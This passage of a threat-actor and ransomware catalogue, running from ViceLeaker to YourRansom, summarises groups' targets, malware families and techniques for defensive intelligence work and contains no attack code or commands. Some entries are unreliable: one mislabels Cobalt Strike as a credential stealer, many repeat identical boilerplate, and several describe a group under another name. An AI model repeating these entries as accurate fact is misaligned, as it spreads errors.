In May 2018, we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens. Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims; and a hash of the APK involved (Android application) was tagged in our sample feed for inspection. Once we looked into the file, we quickly found out that the inner-workings of the APK included a malicious payload, embedded in the original code of the application. This was an original spyware program, designed to exfiltrate almost all accessible information. During the course of our research, we noticed that we were not the only ones to have found the operation. Researchers from Bitdefender also released an analysis of one of the samples in a blogpost. Although something had already been published, we decided to do something different with the data we acquired. The following month, we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples. We decided to call the operation “ViceLeaker”, because of strings and variables in its code.
VICEROY TIGER
VICEROY TIGER is an adversary with a nexus to India that has historically targeted entities throughout multiple sectors. Older activity targeted multiple sectors and countries; however, since 2015 this adversary appears to focus on entities in Pakistan with a particular focus on government and security organizations. This adversary consistently leverages spear phishing emails containing malicious Microsoft Office documents, malware designed to target the Android mobile platform, and phishing activity designed to harvest user credentials. In March 2017, the 360 Chasing Team found a sample of targeted attacks that confirmed the previously unknown sample of APT's attack actions, which the organization can now trace back at least in April 2016. The chasing team named the attack organization APT-C-35. In June 2017, the 360 Threat Intelligence Center discovered the organization’s new attack activity, confirmed and exposed the gang’s targeted attacks against Pakistan, and analyzed in detail. The unique EHDevel malicious code framework used by the organization.
Vicious Panda
Check Point Research discovered a new campaign against the Mongolian public sector, which takes advantage of the current Coronavirus scare, in order to deliver a previously unknown malware implant to the target. A closer look at this campaign allowed us to tie it to other operations which were carried out by the same anonymous group, dating back to at least 2016. Over the years, these operations targeted different sectors in multiple countries, such as Ukraine, Russia, and Belarus.
ViciousTrap
ViciousTrap has compromised over 5,500 edge devices, transforming them into honeypots and utilizing a shell script called NetGhost to redirect incoming traffic from specific ports to their infrastructure. The actor has targeted various EOL devices, including ASUS routers, Linksys LRT224, and Araknis Networks AN-300-RT-4L2W VPN routers. Observations indicate attempts to deploy a web shell for executing their redirection script, although authorship of the web shell has not been attributed to ViciousTrap. The overall objectives of ViciousTrap remain unclear, but their activities suggest a honeypot-style network aimed at intercepting network flows.
VideoBelle
ransomware
ViiperWare
ransomware
Viking Jackal
Viking Jackal is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
VIKING SPIDER
VIKING SPIDER is the criminal group behind the development and distribution of Ragnar Locker ransomware. While public reporting indicates the group began threatening to leak victim data in February 2020, a DLS was not observed until April 2020. The DLS is hosted on Tor, and similar to other actors, proof of data exfiltration is provided before the stolen data is fully leaked. It was also noted that On Dec. 22, 2020, a new post made to MountLocker ransomware’s Tor-hosted DLS was titled 'Cartel News' and included details of a victim of VIKING SPIDER’s Ragnar Locker
VindowsLocker Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom amount is 349.99$ and the hacker seems to be from India. He disguises himself as Microsoft Support.
Virlock
Ransomware Polymorphism / Self-replication
Viro
ransomware
ViroBotnet
ransomware
Virus-Encoder
Ransomware
VisionCrypt
ransomware
VMola
ransomware
Void Arachne
Void Arachne is a threat actor group targeting Chinese-speaking users with malicious MSI files containing legitimate software installers for AI software. They exploit public interest in VPN technology and AI software to distribute malware through SEO poisoning and Chinese-language-themed Telegram channels. The group's campaign includes bundling malicious Winos payloads with deepfake pornography-generating AI software and voice-and-face-swapping AI software. Void Arachne also promotes AI technologies for virtual kidnapping and uses AI voice-alternating technology to pressure victims into paying ransom.
Void Balaur
Void Balaur is a highly active hack-for-hire / cyber mercenary group with a wide range of known target types across the globe. Their services have been observed for sale to the public online since at least 2016. Services include the collection of private data and access to specific online email and social media services, such as Gmail, Outlook, Telegram, Yandex, Facebook, Instagram, and business emails.
Void Banshee
Void Banshee is an APT group targeting North America, Europe, and Southeast Asia for information theft and financial gain. They exploit vulnerabilities like CVE-2024-38112 to deliver the Atlantida info-stealer through malicious PDFs disguised as book files. The group uses internet shortcuts with MHTML protocol handlers to access and execute files through disabled Internet Explorer, posing a significant threat to organizations. Void Banshee's TTPs include crafting URL strings to control window sizes in IE and using HTML files to hide malicious downloads from victims.
Void Blizzard
Void Blizzard’s cyberespionage operations tend to be highly targeted at specific organizations of interest to the Russian government, including in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors primarily in Europe and North America. The threat actor uses stolen credentials—which are likely procured from commodity infostealer ecosystems—and collects a high volume of email and files from compromised organizations.
Void Manticore
Void Manticore is an Iranian APT group affiliated with MOIS, known for conducting destructive wiping attacks and influence operations. They collaborate with Scarred Manticore, sharing targets and conducting disruptive operations using custom wipers. Void Manticore's TTPs involve manual file deletion, lateral movement via RDP, and the deployment of custom wipers like the BiBi wiper. The group utilizes online personas like 'Karma' and 'Homeland Justice' to leak information and amplify the impact of their attacks.
Void Rabisu
Void Rabisu is an intrusion set associated with both financially motivated ransomware attacks and targeted campaigns on Ukraine and countries supporting Ukraine.
VoidCrypt
ransomware
Vojenské spravodajstvo
Military Intelligence - Vojenské spravodajstvo
Vojna sigurnosno-obavještajna agencija
Vojna sigurnosno-obavještajna agencija (VSOA) (Military Security and Intelligence Agency)
Vojnoobaveštajna agencija
Military Intelligence Agency – Војнообавештајна агенција (VOA)
Volga Flood
Microsoft threat actor profile. Origin/Threat: Russia, Influence operations.
Vortex Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Vovalex
ransomware
Vsop
aka Onix/Onyx
Vulcan
Vulcan is an active ransomware-as-a-service operation tracked by RansomLook.
Vulston
ransomware
VulzSecTeam
VulzSec, also known as VulzSecTeam, is a hacktivist group that has been involved in various cyber-attacks. They have targeted government websites in retaliation for issues such as police brutality and the treatment of Indian Muslims. The group has been involved in campaigns like OpIndia2.0, where they planned to launch DDoS attacks on Indian government websites.
Vurten
Vurten is an active extortion or ransomware group tracked by RansomLook.
VxLock Ransomware
Developed in Visual Studios in 2010. Original name is VxCrypt. This ransomware encrypts your files, including photos, music, MS office, Open Office, PDF… etc
vxLock
Ransomware
w3crypto
w3crypto is an active extortion or ransomware group tracked by RansomLook.
Waffle
ransomware
WageMole
WageMole is a North Korean state-sponsored APT that employs social engineering and technology to secure remote job opportunities in Western countries, leveraging stolen personal data from the Contagious Interview campaign. Threat actors create fake identities, including passports and driver's licenses, and prepare study guides for interviews, often utilizing generative AI for well-structured responses. They target small to mid-sized businesses and utilize job platforms like Upwork and Indeed, while employing automation scripts for account creation. WageMole's activities include sharing code within their group and requesting payments through platforms like PayPal to conceal their identity.
Waissbein
Waissbein is an active extortion or ransomware group tracked by RansomLook.
Waiting
ransomware
Waldo
ransomware
Walocker
Walocker is an active extortion or ransomware group tracked by RansomLook.
Wanna Decryptor Portuguese
ransomware
WannabeHappy
ransomware
WannaCash
ransomware
WannaCry
According to numerous open-source reports, a widespread ransomware campaign is affecting various organizations with reports of tens of thousands of infections in as many as 74 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France, and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry, or Wanna Decryptor, was discovered the morning of May 12, 2017, by an independent security researcher and has spread rapidly over several hours, with initial reports beginning around 4:00 AM EDT, May 12, 2017. Open-source reporting indicates a requested ransom of .1781 bitcoins, roughly $300 U.S.
WannaDie
ransomware
WannaPeace
ransomware
WannaSmile
zCrypt variant discovered on November 17, 2017, one day after the discovery of TYRANT. Used Farsi-language ransom note asking for a staggering 20 Bitcoin ransom payment. Also advertised local Iran-based payment processors and exchanges—www.exchangeing[.]ir, www.payment24[.]ir, www.farhadexchange.net, and www.digiarz.com)—through which Bitcoins could be acquired.
WannaSpam
ransomware
Want Money
ransomware
Warlock
Warlock is an active extortion or ransomware group tracked by RansomLook.
WARP PANDA
WARP PANDA is a China-nexus APT that targets VMware vCenter environments and Microsoft Azure infrastructures, primarily focusing on legal, technology, and manufacturing sectors in the U.S. The group exploits internet-facing edge devices for initial access, later pivoting to vCenter environments using compromised credentials or vulnerabilities. Their toolkit includes the BRICKSTORM backdoor, along with implants like Junction and GuestConduit, which facilitate command execution and network traffic tunneling. WARP PANDA demonstrates advanced OPSEC and aims for long-term persistence and data exfiltration aligned with the interests of the People's Republic of China.
Wassonite
WASSONITE is a North Korea-linked APT that has targeted industrial sectors, including electric generation, nuclear energy, manufacturing, and research entities in India, South Korea, and Japan since at least 2018. The group employs DTrack RAT for remote access, Mimikatz for credential capture, and various system tools for lateral movement and file transfers. WASSONITE has been observed using nuclear energy-themed spear phishing lures to deploy the AppleSeed backdoor, which can take screenshots, log keystrokes, and execute commands from a C2 server. Their operations focus on initial access, reconnaissance, and data collection without demonstrating disruptive capabilities.
WastedLocker
WastedLocker primarily targets corporate networks. Upon initial compromise, often using a fake browser update containing SocGholish, the actor then takes advantage of dual-use and LoLBin tools in an attempt to evade detection. Key observations include lateral movement and privilege escalation. The WastedLocker ransomware has been tied back to EvilCorp.
Watchdog
Thief Libra is a cloud-focused threat group that has a history of cryptojacking operations as well as cloud service platform credential scraping. They were first known to operate on January 27, 2019. They use a variety of custom build Go Scripts as well as repurposed cryptojacking scripts from other groups including TeamTNT. They are currently considered to be an opportunistic threat group that targets exposed cloud instances and applications.
Water Bakunawa
Water Bakunawa is a cybercriminal group identified by Trend Micro, responsible for the RansomHub ransomware, which exploits the Zerologon vulnerability to gain unauthorized network access. The group employs EDRKillShifter to evade detection and disrupt security monitoring processes, utilizing advanced anti-EDR techniques. Their targets include sectors such as water and wastewater, IT, healthcare, and financial services. Members of the group and related affiliates have linked by association with other high-profile RaaS groups like Scattered Spider and ALPHV.
Water Barghest
Water Barghest is a cybercriminal group that has compromised over 20,000 IoT devices by October 2024, monetizing them through a residential proxy marketplace. They automate the entire process from identifying vulnerable devices using n-day and zero-day exploits to deploying Ngioweb malware and selling the compromised assets. Their operations include leveraging Ubiquiti EdgeRouter devices for espionage and utilizing automated scripts to exploit vulnerabilities within minutes of discovery. Water Barghest has maintained a low profile for years, but their activities gained attention due to the deployment of a zero-day vulnerability against Cisco IOS XE devices in October 2023.
Water Curupira
With its emergence in 2022, Water Curupira has established itself as a persistent threat actor targeting organizations primarily in South America and Europe. Their modus operandi involves a combination of social engineering tactics and a diversified malware arsenal, including ransomware variants like Black Basta and credential stealers like Cobalt Strike. This multifaceted approach enables them to gain unauthorized access to victim systems, steal sensitive data, and ultimately extort victims through ransomware demands. It has been actively using Pikabot, a loader malware with similarities to Qakbot, in spam campaigns throughout 2023.
Water Gamayun
Water Gamayun exploits the MSC EvilTwin zero-day vulnerability to compromise systems and exfiltrate data, utilizing custom payloads and advanced data exfiltration techniques. Their arsenal includes backdoors like SilentPrism and DarkWisp, as well as information stealers such as Stealc and Rhadamanthys. They employ delivery methods like provisioning malicious payloads through signed Microsoft Installer files and leveraging LOLBins to maintain persistence and control over infected systems. Comprehensive analysis of their command-and-control infrastructure reveals sophisticated evasion techniques and dynamic control capabilities.
Water Kurita
Water Kurita is a financially motivated cybercriminal entity associated with the Lumma Stealer infostealer-as-a-service operation, primarily active on underground forums and marketplaces. It focuses on credential and information theft at scale, monetizing access via subscription-based malware distribution and resale of stolen data to other actors. The group demonstrates solid operational security and marketing tactics typical of mature MaaS ecosystems, although a 2025 doxxing campaign exposing alleged core members (personal and financial data) significantly disrupted its activity and drove customers toward competing infostealers.
Water Labbu
Trend Micro discovered a threat actor they named Water Labbu that was targeting cryptocurrency scam websites. Typically, cryptocurrency scammers use social engineering techniques, interacting with victims to gain their trust and then manipulating them into providing the permissions needed to transfer cryptocurrency assets. While Water Labbu managed to steal cryptocurrencies via a similar method by obtaining access permissions and token allowances from their victim’s wallets, unlike other similar campaigns, they did not use any kind of social engineering — at least not directly. Instead, Water Labbu lets other scammers use their social engineering tricks to scam unsuspecting victims.
Water Makara
Water Makara employs the Astaroth banking malware, which features a new defense evasion technique. Their spear phishing campaigns exploit human error by targeting users to click on malicious files. To mitigate these threats, organizations should implement regular security training, enforce strong password policies, utilize multifactor authentication (MFA), keep security solutions updated, and apply the principle of least privilege.
Water Orthrus
Water Orthrus is a threat actor known for distributing CopperStealer and CopperPhish malware. They target Microsoft 365 users with phishing campaigns to steal credit card information. The actor has evolved their malware to include rootkits for stealthy installations and has shifted their focus from personal information to cryptocurrency and credit card data. Water Orthrus has been linked to the Scranos campaign reported in 2019.
Water Saci
Water Saci is a sophisticated cyber threat actor operating in Brazil, utilizing a multi-format attack chain that includes HTA files, ZIP archives, and PDFs to bypass security measures. The campaign employs an email-based C&C infrastructure using IMAP connections to terra.com.br accounts, enhancing its resilience and evasion tactics. It leverages social engineering through WhatsApp to propagate malware, specifically the SORVEPOTEL banking trojan, and incorporates advanced techniques for infection and persistence. The modular architecture of the malware allows for dynamic adaptation and extraction of sensitive credentials, indicating a significant evolution in adversarial capabilities.
Water Sigbin
The 8220 Gang, also known as Water Sigbin, is a threat actor group that focuses on deploying cryptocurrency-mining malware. They exploit vulnerabilities in Oracle WebLogic servers, such as CVE-2017-3506 and CVE-2023-21839, to deliver cryptocurrency miners using PowerShell scripts. The group has demonstrated a sophisticated multistage loading technique to deploy the PureCrypter loader and XMRIG crypto miner. They are known for using obfuscation techniques, such as hexadecimal encoding and code obfuscation, to evade detection and compromise systems.
Wcry Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
Weaxor
Weaxor is an active extortion or ransomware group tracked by RansomLook.
Webworm
Space Pirates is a cybercrime group that has been active since at least 2017. They primarily target Russian companies and have been observed using various malware, including Deed RAT and ShadowPad. The group uses a combination of publicly available tools and their own protocols to communicate with their command-and-control servers.
WeChat Ransom
Over 100,000 thousand computers in China have been infected in just a few days with poorly-written ransomware that encrypts local files and steals credentials for multiple Chinese online services. The crooks show a screen titled UNNAMED1989 and demand the victim a ransom of 110 yuan ($16) in exchange for decrypting the files, payable via Tencent's WeChat payment service by scanning a QR code.
WeedSec
WeedSec is a threat actor group that recently targeted the online learning and course management platform Moodle. They posted sample databases of Moodle on their Telegram channel, which is widely used by educational institutions and workplaces.
WeRedEvils
WeRedEvils is a hacking group that has claimed responsibility for multiple cyber attacks. They targeted the Iranian Electric Grid and the Tasnimnews website, causing the latter to go offline. The group also claimed to have hacked into Iran's oil infrastructure, causing significant damage. They emerged in response to the Hamas massacre and are believed to be a group of Israeli cyber experts.
Werewolves
Werewolves is an active extortion or ransomware group tracked by RansomLook.
Wesker
ransomware
WET PANDA
WET PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
weyhro
Appears to be a Data Extortion group with no encryption.
WhatAFuck
ransomware
Wheat Tempest
Microsoft threat actor profile. Origin/Threat: Financially motivated.
WhisperGate
Destructive malware deployed against targets in Ukraine in January 2022.
White Bear
As a part of our Kaspersky APT Intelligence Reporting subscription, customers received an update in mid-February 2017 on some interesting APT activity that we called WhiteBear. Much of the contents of that report are reproduced here. WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report “Skipper Turla – the White Atlas framework” from mid-2016. Like previous Turla activity, WhiteBear leverages compromised websites and hijacked satellite connections for command and control (C2) infrastructure. As a matter of fact, WhiteBear infrastructure has overlap with other Turla campaigns, like those deploying Kopiluwak, as documented in “KopiLuwak – A New JavaScript Payload from Turla” in December 2016. WhiteBear infected systems maintained a dropper (which was typically signed) as well as a complex malicious platform which was always preceded by WhiteAtlas module deployment attempts. However, despite the similarities to previous Turla campaigns, we believe that WhiteBear is a distinct project with a separate focus. We note that this observation of delineated target focus, tooling, and project context is an interesting one that also can be repeated across broadly labeled Turla and Sofacy activity. From February to September 2016, WhiteBear activity was narrowly focused on embassies and consular operations around the world. All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations. Continued WhiteBear activity later shifted to include defense-related organizations into June 2017. When compared to WhiteAtlas infections, WhiteBear deployments are relatively rare and represent a departure from the broader Skipper Turla target set. Additionally, a comparison of the WhiteAtlas framework to WhiteBear components indicates that the malware is the product of separate development efforts. WhiteBear infections appear to be preceded by a condensed spearphishing dropper, lack Firefox extension installer payloads, and contain several new components signed with a new code signing digital certificate, unlike WhiteAtlas incidents and modules.
White Lock
White Lock is an active extortion or ransomware group tracked by RansomLook.
WhiteCobra
WhiteCobra is a threat actor that has infiltrated the Visual Studio Code marketplace and Open VSX registry, deploying 24 malicious extensions targeting cryptocurrency development tools, particularly Solidity. The group employs social engineering tactics, manipulates download counts and reviews, and uses fake branding to establish credibility for their extensions, which deliver LummaStealer on Windows and unknown malware on macOS. WhiteCobra has been linked to a $500,000 cryptocurrency theft in July 2025 and maintains detailed playbooks with revenue targets, showcasing their organized and persistent operations. Despite ongoing efforts by security researchers to remove their malicious extensions, WhiteCobra continues to upload new threats weekly, highlighting the sophistication of their TTPs.
WhiteRose
A new ransomware has been discovered by MalwareHunterTeam that is based off of the InfiniteTear ransomware family, of which BlackRuby and Zenis are members. When this ransomware infects a computer it will encrypt the files, scramble the filenames, and append the .WHITEROSE extension to them.
WhoLocker
ransomware
WhyCry
ransomware
WickedLocker HT Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Wiki Ransomware
Wiki Ransomware is an active extortion or ransomware group tracked by RansomLook.
wikileaksv2
Group is connected to Qilin.
WildCard
Wildcard is a threat actor that initially targeted Israel's educational sector with the SysJoker malware. They have since expanded their operations and developed additional malware variants, disguised as legitimate software, including one written in the Rust programming language called RustDown. Their precise identity remains unknown, but they have shown advanced capabilities and a focus on critical sectors within Israel.
WildFire Locker
Ransomware Zyklon variant
WildNeutron
A corporate espionage group has compromised a string of major corporations over the past three years in order to steal confidential information and intellectual property. The gang, which Symantec calls Butterfly, is not-state sponsored, rather financially motivated. It has attacked multi-billion dollar companies operating in the internet, IT software, pharmaceutical, and commodities sectors. Twitter, Facebook, Apple, and Microsoft are among the companies who have publicly acknowledged attacks. Butterfly is technically proficient and well resourced. The group has developed a suite of custom malware tools capable of attacking both Windows and Apple computers, and appears to have used at least one zero-day vulnerability in its attacks. It keeps a low profile and maintains good operational security. After successfully compromising a target organization, it cleans up after itself before moving on to its next target. This group operates at a much higher level than the average cybercrime gang. It is not interested in stealing credit card details or customer databases and is instead focused on high-level corporate information. Butterfly may be selling this information to the highest bidder or may be operating as hackers for hire. Stolen information could also be used for insider-trading purposes.
WildPressure
WildPressure is a threat actor that targets industrial-related entities in the Middle East. They use a variety of programming languages, including C++, VBScript, and Python, to develop their malware. They have been observed using virtual private servers and compromised servers, particularly WordPress websites, in their infrastructure. While there are some minor similarities with other threat actors in the region, there is not enough evidence to make any attribution.
Windows_Security Ransonware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Windows10
ransomware
WininiCrypt
ransomware
Winnix Cryptor Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
WinRarer Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Winsecure
ransomware
WinUpdatesDisabler
ransomware
WinWord64
ransomware
WIP19
WIP19 is a Chinese-speaking threat group involved in espionage targeting the Middle East and Asia. They utilize a stolen certificate to sign their malware, including SQLMaggie, ScreenCap, and a credential dumper. The group has been observed targeting telecommunications and IT service providers, using toolsets authored by WinEggDrop. WIP19's activities suggest they are after specific information and are part of the broader Chinese espionage landscape.
Wiper Leak
Wiper Leak is an active extortion or ransomware group tracked by RansomLook.
Wisteria Tsunami
Microsoft threat actor profile. Origin/Threat: India, Private sector offensive actor.
Witchetty
Witchetty was first documented by ESET in April 2022, who concluded that it was one of three sub-groups of TA410, a broad cyber-espionage operation with some links to the Cicada group (aka APT10). Witchetty’s activity was characterized by the use of two pieces of malware, a first-stage backdoor known as X4 and a second-stage payload known as LookBack. ESET reported that the group had targeted governments, diplomatic missions, charities, and industrial/manufacturing organizations.
WIZARD SPIDER
Wizard Spider is reportedly associated with Grim Spider and Lunar Spider. The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware. This group represents a growing criminal enterprise of which GRIM SPIDER appears to be a subset. The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot (aka IcedID), which was first observed in April 2017. The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud, through the use of webinjects and a malware distribution function. GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as “big game hunting,” signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell. The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.
WOLF SPIDER
FIN4 is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. FIN4 is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.
WoodRat
ransomware
World Leaks
History and Origins Origins: Formerly known as "Hunters International," active since late 2023, and believed to be a reincarnation of the Hive group. Rebranding: In January 2025, Hunters International ceased file-encrypting attacks and reemerged under the WorldLeaks banner, focusing solely on data theft and extortion. Tactics, Techniques, and Objectives Model: Operates as an "extortion-as-a-service" (EaaS) platform. Affiliates are provided with tools to automatically extract data. Exfiltration & Publication: Theft of sensitive data followed by a threat of publication on a Tor site if the victim refuses to pay No encryption: The group abandons file encryption to focus on theft, reducing complexity and risk
Worok
Worok is a cyber espionage group, mostly targeting Central Asia. The group toolset includes a C++ loader named CLRLoad, a PowerShell backdoor named PowHeartBeat, and a C# loader named PNGLoad.
WTDI
ransomware
WyvernLocker
ransomware
X-Files
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
X Locker 5.0
ransomware
X3M Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. It is also possible to break in using RDP Windows with the help of Pass-the-Hash system, PuTTY, mRemoteNG, TightVNC, Chrome Remote Desktop, modified version of TeamViewer, AnyDesk, AmmyyAdmin, LiteManager, Radmin and others. Ransom is 700$ in Bitcoins.
XakNet
XakNet is a self-proclaimed hacktivist group that has targeted Ukraine. They claim to be comprised of Russian patriotic volunteers and have conducted various threat activities, including DDoS attacks, compromises, data leaks, and website defacements. They coordinate their operations with other hacktivist groups and have connections to APT28, a cyber espionage group sponsored by the GRU.
Xcatze
Cloud security company Lacework says it discovered a threat actor group named Xcatze that uses a Python named AndroxGh0st to take over AWS servers and send out massive email spam campaigns. Lacework says the malware operates by scanning web apps written in the Laravel PHP framework for exposed configuration files to identify and steal server credentials. Researchers said AndroxGh0st specifically searches for AWS, SendGrid, and Twilio credentials, which it uses to take control of email servers and accounts and send out the spam campaigns.
XCry
ransomware
XCrypt Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Written on Delphi. The user requests the victim to get in touch with him through ICQ to get the ransom and return the files.
XD Locker
ransomware
XD
ransomware
XData
ransomware
XDSpy
Rare is the APT group that goes largely undetected for nine years, but XDSpy is just that; a previously undocumented espionage group that has been active since 2011. It has attracted very little public attention, with the exception of an advisory from the Belarusian CERT in February 2020. In the interim, the group has compromised many government agencies and private companies in Eastern Europe and the Balkans.
Xelera
Xelera is an active extortion or ransomware group tracked by RansomLook.
XeroWare
ransomware
Xiaoqiying
Xiaoqiying is a primarily Chinese-speaking threat group that is most well known for conducting website defacement and data exfiltration attacks on more than a dozen South Korean research and academic institutions in late-January 2023. Research from Recorded Futures Insikt Group has found that the groups affiliated threat actors have signaled a new round of cyberattacks against organizations in Japan and Taiwan. Although it shows no clear ties to the Chinese government, Xiaoqiying is staunchly pro-China and vows to target NATO countries as well as any country or region that is deemed hostile to China.
Xinglocker
xing use a custom mountlocker exe
Xinof
Xinof is an active extortion or ransomware group tracked by RansomLook.
XinXin
XinXin is a Chinese-speaking threat actor known for its phishing-as-a-service platform, Lucid, which targets global organizations to steal credit card details and personally identifiable information through smishing campaigns. The group employs advanced techniques such as exploiting Rich Communication Services and Apple's iMessage protocol to bypass traditional SMS filters. XinXin also develops and utilizes other phishing kits like Lighthouse and Darcula, facilitating large-scale phishing operations with automated tools and evasion techniques. The group operates a structured hierarchy and monetizes stolen data while actively supporting the development of similar PhaaS services.
Xleaks
Xleaks is an active extortion or ransomware group tracked by RansomLook.
Xlockr
ransomware
XmdXtazX
ransomware
XMRLocker
ransomware
Xncrypt
ransomware
Xollam
Xollam is an active extortion or ransomware group tracked by RansomLook.
Xolzsec
ransomware written by self proclaimed script kiddies that should really be considered trollware
Xorist
Ransomware encrypted files will still have the original non-encrypted header of 0x33 bytes length
xp95
xp95 is an active extortion or ransomware group tracked by RansomLook.
XRat
ransomware
XRTN
Ransomware VaultCrypt family
XTPLocker 5.0 Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
xXLecXx
ransomware
XyuEncrypt
ransomware
XYZWare Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear
Yanbian Gang
RiskIQ characterizes the Yanbian Gang as a group that targeted South Korean Android mobile banking customers since 2013 with malicious Android apps purporting to be from major banks, namely Shinhan Savings Bank, Saemaul Geumgo, Shinhan Finance, KB Kookmin Bank, and NH Savings Bank.
Yanluowang
Ransomware.
Yashma
Cisco Talos has identified a new, previously unknown threat actor of Vietnamese origin conducting a ransomware operation that began at least on June 4, 2023. The ongoing attack utilizes a variant of the Yashma Ransomware, likely targeting multiple geographical areas and mimicking the characteristics of WannaCry. The threat actor uses an unusual technique to deliver the ransom note, as instead of embedding the ransom note strings in the binary, the actor downloads the ransom note from a GitHub repository controlled by ,the actor by executing an embedded batch file. Talos stated that this threat actor targets victims in English-speaking countries, Bulgaria, China, and Vietnam, as the GitHub account of the actor "nguyenvientphat" contains ransomware notes written in the languages of these countries. The presence of the ransom note may indicate that the actor intends to expand its geographical area of operation. The company also stated that the threat actor may have Vietnamese origin because the GitHub account name and email contact in the ransom notes fake the name of a legitimate organization. The ransom note also asks victims to contact between 19:00 and 23:00 UTC +07:00, coinciding with the Vietnam time zone. A difference was also identified in the Vietnamese language ransom note, as it begins with "Sorry, your file is encrypted!" compared to the other notes that state "Oops, your files are encrypted!". By saying "sorry," the threat actor may intend to show greater sensitivity to victims in Vietnam, indicating that the attackers themselves are Vietnamese. Talos further mentioned that the threat actor started the campaign around June 4, 2023, as they joined GitHub and created a public repository called "Ransomware." In the repository, the threat actor added text files of ransom notes in five languages: English, Bulgarian, Vietnamese, simplified Chinese, and traditional Chinese. The note presents the email address "nguyenvietphat[.]n@gmail[.]com," for victims to contact them. At the time of analysis, no Bitcoin was observed in the wallet, and the ransom note did not specify an amount, indicating that the ransomware operation could still be in its early stages. The threat actor deployed a variant of the Yashma ransomware, which they compiled on June 4, 2023. It is worth noting that Yashma is a 32-bit executable written in .NET and a renamed version of the Chaos Ransomware V5, which appeared in May 2022. In the variant, most of Yashma's features remained unchanged and were described by BlackBerry security researchers, with some notable modifications. The ransomware stores the ransom note text as strings in the binary, but this Yashma variant executes an embedded batch file, which contains the commands to download the ransom note from the actor-controlled GitHub repository. This modification avoids endpoint detection solutions and antivirus software, which typically detect embedded ransom note strings in the binary. Previous versions of Yashma established persistence on the victim's machine in the Run registry key and by dropping a Windows shortcut file pointing to the executable path of the ransomware in the startup folder. The identified variant also established persistence in the Run registry key. However, it was modified to create a ".url" favorites file in the startup folder pointing to the executable located in "%AppData%\Roaming\svchost.exe." Additionally, the threat actor chose to maintain Yashma's anti-recovery capability in this variant. After encrypting a file, the ransomware wipes the content of the original unencrypted files, writes a single "?" character, and then deletes the file. This technique makes it more difficult for incident responders and forensic analysts to recover deleted files from the victim's hard drive.
Yatron
ransomware
Ymir
Ymir is an active extortion or ransomware group tracked by RansomLook.
Yogynicof
ransomware
YoroTrooper
YoroTrooper’s main targets are government or energy organizations in Azerbaijan, Tajikistan, Kyrgyzstan and other Commonwealth of Independent States, based on Cisco Talos analysis. YoroTrooper was also observed compromising accounts from at least two international organizations: a critical European Union health care agency and the World Intellectual Property Organization. Successful compromises also included Embassies of European countries including Azerbaijan and Turkmenistan.
Yoshikada
ransomware
You Have Been Hacked!!!
Ransomware Attempt to steal passwords
YouAreFucked Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
YourRansom Ransomware
